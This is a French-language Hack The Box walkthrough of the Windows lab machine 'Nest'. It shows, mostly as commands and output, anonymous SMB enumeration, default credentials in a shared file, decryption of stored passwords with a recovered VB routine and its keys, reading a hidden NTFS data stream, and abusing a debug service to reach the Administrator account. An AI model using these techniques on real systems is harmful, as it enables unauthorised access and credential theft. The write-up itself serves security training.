Hack The Box - Nest

Nest est une machine Windows considérée comme facile/moyenne. Un accès SMB anonyme permet de récupérer un premier compte non privilégié. La récupération d’un mot de passe chiffré et des sources d’un projet Visual Basic permet, après manipulation de récupérer le mot de passe de l’utilisateur en clair. L’escalade de privilège se fait au travers d’un service de “reporting” permettant ainsi de récupérer une nouvelle chaine chiffrée sur le disque. Le déchiffrement de cette dernière permet un accès administrate

Disclaimer : Il s’agit d’une présentation plutôt rapide qui omet volontairement les différents axes de recherche. Seul les résultats effectifs ainsi qu’une rapide démarche sont présentés.

Découverte / Énumération

Un rapide scan de ports permet d’obtenir les services présents sur la machine.

$ sudo nmap -sS -p 0-10000 -T4 -sV -sC default -O -v -oN scan_nmap 10.10.10.178

Nmap scan report for 10.10.10.178
Host is up (0.030s latency).
Not shown: 9999 filtered ports
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe: 
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     Reporting Service V1.2
|     Unrecognised command
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.70%I=7%D=2/23%Time=5E52D49C%P=x86_64-pc-linux-gnu%r(NU
SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\
SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionReq,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,21,"\r\nH
SF:QK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\nHQK\x20
SF:Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A,"\r\nHQ
SF:K\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\
SF:r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n
SF:>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\
SF:n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n
SF:>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\
SF:r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20Reporting
SF:\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x20Reporti
SF:ng\x20Service\x20V1\.2\r\n\r\n>")%r(NCP,21,"\r\nHQK\x20Reporting\x20Ser
SF:vice\x20V1\.2\r\n\r\n>");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.473 days (since Sat Feb 22 09:20:24 2020)
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental

Host script results:
|_clock-skew: mean: 1m52s, deviation: 0s, median: 1m52s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-23 20:42:32
|_  start_date: 2020-02-22 09:23:12

NSE: Script Post-scanning.
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1012.52 seconds
           Raw packets sent: 30720 (1.357MB) | Rcvd: 663 (31.066KB)

Le scan révèle la présence d’un port 445, classique, mais également le port 4386, qui semble être un service de “Reporting”.

Accès SMB anonyme et récupération d’un compte temporaire

Pour les première recherches, on se tourne vers un service que l’on connait déjà, les partages SMB. Grâce à une connexion anonyme, nous sommes en mesure de lister les partages visibles.

$ smbclient -U "" -L \\\\10.10.10.178
Unable to initialize messaging context
Enter WORKGROUP\'s password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    Data            Disk      
    IPC$            IPC       Remote IPC
    Secure$         Disk      
    Users           Disk      
SMB1 disabled -- no workgroup available

À priori, 3 partages peuvent être intéressants pour le moment : - Data - Secure$ - USers$

On commencer par regarder du côté du partage Users$ ce qui permet entre autres de récupérer la liste des utilisateurs de la machine. Utile !

$ smbclient -U "" \\\\10.10.10.178\\Users
Unable to initialize messaging context
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 00:04:21 2020
  ..                                  D        0  Sun Jan 26 00:04:21 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019

        10485247 blocks of size 4096. 6545336 blocks available

Par curiosité, on tente également d’aller faire un tour sur le partage Secure$. Comme son nom l’indique, ce dernier est plus sécurisé et il n’est pas possible de s’y connecter sans compte utilisateur.

$ smbclient -U "" \\\\10.10.10.178\\Secure$
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*

Dernière piste, le partage Data sur lequel on a accès à plusieurs éléments.

$ smbclient -U "" \\\\10.10.10.178\\Data   
Unable to initialize messaging context
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 00:53:46 2019
  ..                                  D        0  Thu Aug  8 00:53:46 2019
  IT                                  D        0  Thu Aug  8 00:58:07 2019
  Production                          D        0  Mon Aug  5 23:53:38 2019
  Reports                             D        0  Mon Aug  5 23:53:44 2019
  Shared                              D        0  Wed Aug  7 21:07:51 2019

        10485247 blocks of size 4096. 6545336 blocks available

Après quelques recherches, on tombe rapidement sur un fichier texte “Welcome Email”. Ce type de fichier peut être très intéressant car peut contenir des informations telles que des comptes par défaut.

smb: \Shared\Templates\HR\> ls
  .                                   D        0  Wed Aug  7 21:08:01 2019
  ..                                  D        0  Wed Aug  7 21:08:01 2019
  Welcome Email.txt                   A      425  Thu Aug  8 00:55:36 2019

        10485247 blocks of size 4096. 6545577 blocks available

smb: \Shared\Templates\HR\> get "Welcome Email.txt"
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)

La récupération de ce fichier donne effectivement les informations souhaitées, puisqu’un compte, accompagné de son mot de passe, est identifié !

$ cat Welcome\ Email.txt 
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR%        
````

On file de ce pas tenter une connexion avec notre nouveau compte du côté du partage `Secure$`, non accessible auparavant et bingo, celui ci devient à notre portée.

```bash
$ smbclient -U "TempUser" \\\\10.10.10.178\\Secure$
Unable to initialize messaging context
Enter WORKGROUP\TempUser\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 01:08:12 2019
  ..                                  D        0  Thu Aug  8 01:08:12 2019
  Finance                             D        0  Wed Aug  7 21:40:13 2019
  HR                                  D        0  Thu Aug  8 01:08:11 2019
  IT                                  D        0  Thu Aug  8 12:59:25 2019

Énumération et récupération du projet VB

Ici commence une nouvelle phase d’énumération. En effet, l’ensemble des éléments non accessibles auparavant doivent être analysés, à la recherche de nouvelles informations. Cela comprend notamment une portion du partage Data$ auparavant inaccessible.

$ smbclient -U "TempUser" \\\\10.10.10.178\\Data    
Enter WORKGROUP\TempUser\'s password: 
Try "help" to get a list of possible commands.
smb: \> cd IT
smb: \IT\> ls
  .                                   D        0  Thu Aug  8 00:58:07 2019
  ..                                  D        0  Thu Aug  8 00:58:07 2019
  Archive                             D        0  Tue Aug  6 00:33:58 2019
  Configs                             D        0  Thu Aug  8 00:59:34 2019
  Installs                            D        0  Thu Aug  8 00:08:30 2019
  Reports                             D        0  Sun Jan 26 01:09:13 2020
  Tools                               D        0  Tue Aug  6 00:33:43 2019

        10485247 blocks of size 4096. 6545577 blocks available
smb: \IT\> cd

De la même façon que précédemment pour le fichier de bienvenue, on tombe rapidement en fouillant les répertoires de configuration sur un fichier intéressant, à priori utilisé pour un projet nommé “RU Scanner”.

smb: \IT\Configs\Ru Scanner\> ls
  .                                   D        0  Wed Aug  7 22:01:13 2019
  ..                                  D        0  Wed Aug  7 22:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 21:49:37 2019

        10485247 blocks of size 4096. 6545577 blocks available
$ cat RU_config.xml 
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>%

Un utilisateur ! Le password semble ici chiffré. Néanmoins, pas de doute, on est sur la bonne piste. Nouvelle mission : trouver le projet “RU Scanner”. En effet, si ce dernier utilise des fichiers de configuration comme celui ci, alors il doit être en mesure de déchiffrer le mot de passe.

Je ne l’ai pas mentionné au début de l’article, mais cette machine repose essentiellement sur de la reconnaissance et de la prise d’information. Une fois n’est pas coutûme, ne pouvant pas avancer, on continue de fouiller les ressources accessibles. Une bonne idée peut être d’aller fouiller les autres ressources du répertoire “Configs”. En effet, on y trouve par exemple une configuration pour le logiciel Notepad++.

smb: \IT\Configs\NotepadPlusPlus\> ls
  .                                   D        0  Wed Aug  7 21:31:37 2019
  ..                                  D        0  Wed Aug  7 21:31:37 2019
  config.xml                          A     6451  Thu Aug  8 01:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 21:30:27 2019

        10485247 blocks of size 4096. 6545509 blocks available

Ce fichier nous révèle notamment un chemin absolu vers le répertoire de l’utilisateur Carl.

    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>

Même si nous n’avons pas les droits pour lister le contenu du répertoire IT, il s’avère qu’il est possible de continuer dans l’arborescence, si on dispose d’un chemin valide. C’est justement ce qu’on vient de trouver. Ainsi, on peut se faufiler vers le répertoire de l’utilisateur. :)

smb: \IT\Carl\> ls
  .                                   D        0  Wed Aug  7 21:42:14 2019
  ..                                  D        0  Wed Aug  7 21:42:14 2019
  Docs                                D        0  Wed Aug  7 21:44:00 2019
  Reports                             D        0  Tue Aug  6 15:45:40 2019
  VB Projects                         D        0  Tue Aug  6 16:41:55 2019

        10485247 blocks of size 4096. 6545509 blocks available

Le répertoire VB Projects indique clairement la voie. Quelques répertoires plus loin, on tombe sur le fameux projet RUScanner !

smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> ls
  .                                   D        0  Thu Aug  8 00:05:54 2019
  ..                                  D        0  Thu Aug  8 00:05:54 2019
  bin                                 D        0  Wed Aug  7 22:00:11 2019
  ConfigFile.vb                       A      772  Thu Aug  8 00:05:09 2019
  Module1.vb                          A      279  Thu Aug  8 00:05:44 2019
  My Project                          D        0  Wed Aug  7 22:00:11 2019
  obj                                 D        0  Wed Aug  7 22:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 17:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 14:55:27 2019
  SsoIntegration.vb                   A      133  Thu Aug  8 00:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 21:49:35 2019

        10485247 blocks of size 4096. 6545509 blocks available

Petite astuce pour télécharger l’ensemble d’un répertoire avec smbclient.

smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> mask ""
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> recurse ON
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> prompt OFF
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> mget *
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\ConfigFile.vb of size 772 as ConfigFile.vb (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
...

Déchiffrement et shell utilisateur

Ayant maintenant le code source du projet VB, le but est d’identifier les parties du codes permettant de réaliser le chiffrement/dechiffrement des mots de passe. Je ne vais pas rentrer dans les détails du code, mais une fonction Decrypt est identifiable assez facilement.

Cette dernière prend plusieurs variables en paramètre, dont le mot de passe chiffré. Si vous ne disposez pas de l’environnement nécessaire pour travailler avec du VB, sachez qu’il existe plusieurs services en ligne offrant un environnement virtuel simplifié.

C’est notamment le cas de dotnetfiddle.com que j’ai utilisé pour cette machine. On extrait ainsi la fonction de déchiffrement, que nous allons appeler dans un simple module, puis on affiche le résultat.

Imports System
Imports System.Security.Cryptography
Imports System.Text

Public Module Module1
    Public Sub Main()
        Console.WriteLine("Hello World")
        Dim password As String
        password = Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        Console.WriteLine(password)
    End Sub
    
    Public Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function
End Module

Le résultat ne se fait pas attendre, on obtient le mot de passe déchiffré !

Hello World
xRxRxPANCAK3SxRxRx

Cela permet notamment de récupérer un accès à une nouvelle zone, ainsi que le flag utilisateur !

$ smbclient -U "c.smith" \\\\10.10.10.178\\Users
Enter WORKGROUP\c.smith\'s password: 
Try "help" to get a list of possible commands.
smb: \> cd C.Smith\
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 08:21:44 2020
  ..                                  D        0  Sun Jan 26 08:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 01:06:17 2019
  user.txt                            A       32  Fri Aug  9 01:05:24 2019

        10485247 blocks of size 4096. 6545509 blocks available

Récupération du mot de passe de DEBUG

Nouvel accès = nouvelle phase d’énumération. Le répertoire HQK Reporting attire notre attention. Souvenez vous, des informations similaires étaient remontées lors du scan nmap. Il est donc logique qu’il s’agisse du service de reporting.

smb: \C.smith\HQK Reporting\> ls
  .                                   D        0  Fri Aug  9 01:06:17 2019
  ..                                  D        0  Fri Aug  9 01:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 14:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 01:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 01:09:05 2019

        10485247 blocks of size 4096. 6544215 blocks available

Lors de mes premières recherches sur la machine, j’avais tenté de me connecter au service et j’avais notamment pu voir une fonctionne de debugging, nécessitant un mot de passe. Cela tombe bien, l’extrait ci-dessus mentionne un fichier Debug Mode Password.txt. Seul problème, le fichier semble vide (taille 0)…

C’est notamment ici qu’intervient une astuce au niveau du système de fichiers, les streams ! Pour faire simple, un stream est une séquence d’octets contenants des informations sur un fichier. Il peut s’agir de mots-clés, informations sur le propriétaire.. etc. Il est possible de créer différents streams.

Avec smbclient on peut notamment voir ces informations grâce à la commande suivante.

smb: \C.smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Fri Aug  9 01:06:12 AM 2019 CEST
access_time:    Fri Aug  9 01:06:12 AM 2019 CEST
write_time:     Fri Aug  9 01:08:17 AM 2019 CEST
change_time:    Fri Aug  9 01:08:17 AM 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

On observe ainsi un élément intéressant… Le stream par défaut ($DATA) est en effet vide, mais un second stream, nommé “Password” a été créé ! smbclient offre également la possibilité de télécharger un fichier en spécifiant les steams souhaités. Ainsi…

smb: \C.smith\HQK Reporting\> get "Debug Mode Password.txt:Password:$Data"
getting file \C.smith\HQK Reporting\Debug Mode Password.txt:Password:$Data of size 15 as Debug Mode Password.txt:Password:$Data (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

$ cat Debug\ Mode\ Password.txt:Password:\$Data 
WBQ201953D8w 

Manipulation du service de Reporting

La résolution de cette machine se poursuit sur le second service identifié lors du scan de ports. On peut ainsi se connecter au service par l’intermédiaire d’un telnet.

$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

Disposant maintenant du mot de passe de DEBUG, on peut lancer ce mode et ainsi récupérer un accès à plus de fonctionnalités.

>DEBUG WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>HELP

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

La commande SERVICE nous permet de prendre connaissance du binaire utilisé ici tandis que la commande SESSION nous indique le répertoire courant.

>SERVICE

--- HQK REPORTING SERVER INFO ---

Version: 1.2.0.0
Server Hostname: HTB-NEST
Server Process: "C:\Program Files\HQK\HqkSvc.exe"
Server Running As: Service_HQK
Initial Query Directory: C:\Program Files\HQK\ALL QUERIES

>SESSION

--- Session Information ---

Session ID: 32315e55-e64a-4b71-bf3f-124285e93ede
Debug: True
Started At: 3/29/2020 11:55:33 AM
Server Endpoint: 10.10.10.178:4386
Client Endpoint: 10.10.14.4:34380
Current Query Directory: C:\Program Files\HQK\ALL QUERIES

Par la suite, les commandes SETDIR, LIST et SHOWQUERY sont utilisées. Dans les fait, on peut s’en servir comme un système nous permettant de parcourir l’arborescence de la machine. En effet, il est possible d’associer ces dernières aux commandes classique cd, ls et cat.

>SETDIR ../

Current directory set to HQK

>LIST

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK

Les répertoires LDAP et Logs attirent notre attention. C’est notamment dans le répertoire LDAP qu’on trouve notre bonheur.

>SETDIR LDAP

Current directory set to LDAP

>LIST

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP

Le fichier Ldap.conf révèle les informations souhaitées, à savoir le mot de passe, chiffré, de l’administrateur !

>SHOWQUERY 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Déchiffrement et escalade de privilège

Ok, on a maintenant un mot de passe chiffré pour le compte privilégié ! Cette partie semblement directement utilisée par le processus afin de réaliser l’authentification de l’administrateur. Ainsi, cela veut dire que nous allons devoir interagir directement avec ce processus.

On commence par le récupérer en local.

Une fois cela fait, on peut décompiler le binaire. J’utilise pour cela dnSpy. Je passe également ici la recherche d’informations, mais on trouve rapidement la fonction de déchiffrement. Celle ci est identique à celle identifiée auparavant pour la partie utilisateur.

À ce moment, deux options afin de déchiffrer le mot de passe : - Modifier le code du binaire, afin d’afficher le mot de passe déchiffré, puis le recompiler et l’exécuter ; - Utiliser une nouvelle fois notre environnement en ligne en modifiant les paramètres de la fonction.

N’étant pas très doué avec dnSpy et étant un peu blasé de cette machine, j’ai pris la solution de facilité en réutilisant la même chose que pour l’utilisateur :).

[...]
Public Sub Main()
        Console.WriteLine("Hello World")
        Dim password As String
        password = Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256, 256)
        Console.WriteLine(password)
    End Sub
[...]

Et ainsi : XtH4nkS4Pl4y1nGX

Tadaaaam! On peut filer récupérer le flag root.

Pour la petite histoire, je suis d’abord allé voir sur le partage Users et voici ce que j’ai trouvé.

$ smbclient -U "Administrator" \\\\10.10.10.178\\Users  
Unable to initialize messaging context
Enter WORKGROUP\Administrator\'s password: 
Try "help" to get a list of possible commands.
smb: \> cd Administrator\
smb: \Administrator\> ls
  .                                   D        0  Fri Aug  9 17:08:23 2019
  ..                                  D        0  Fri Aug  9 17:08:23 2019
  flag.txt - Shortcut.lnk             A     2384  Fri Aug  9 17:10:15 2019

    10485247 blocks of size 4096. 6544908 blocks available

Pas de flag root… Mais un fichier “flag.txt” (impossible à récupérer pour ma part). Après quelques secondes de réflexion, j’ai repensé au fait que le partage Users était une copie/reproduction du répertoire C:/Users de la machine, et que disposant des droits administrateur, on pouvait tout simplement s’y connecter.

$ smbclient -U "Administrator" \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator\'s password: 
Try "help" to get a list of possible commands.
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 08:20:50 2020
  ..                                 DR        0  Sun Jan 26 08:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 23:02:44 2020
  root.txt                            A       32  Tue Aug  6 00:27:26 2019

    10485247 blocks of size 4096. 6543963 blocks available

w00ted !

Hack The Box - Resolute Hack The Box - Monteverde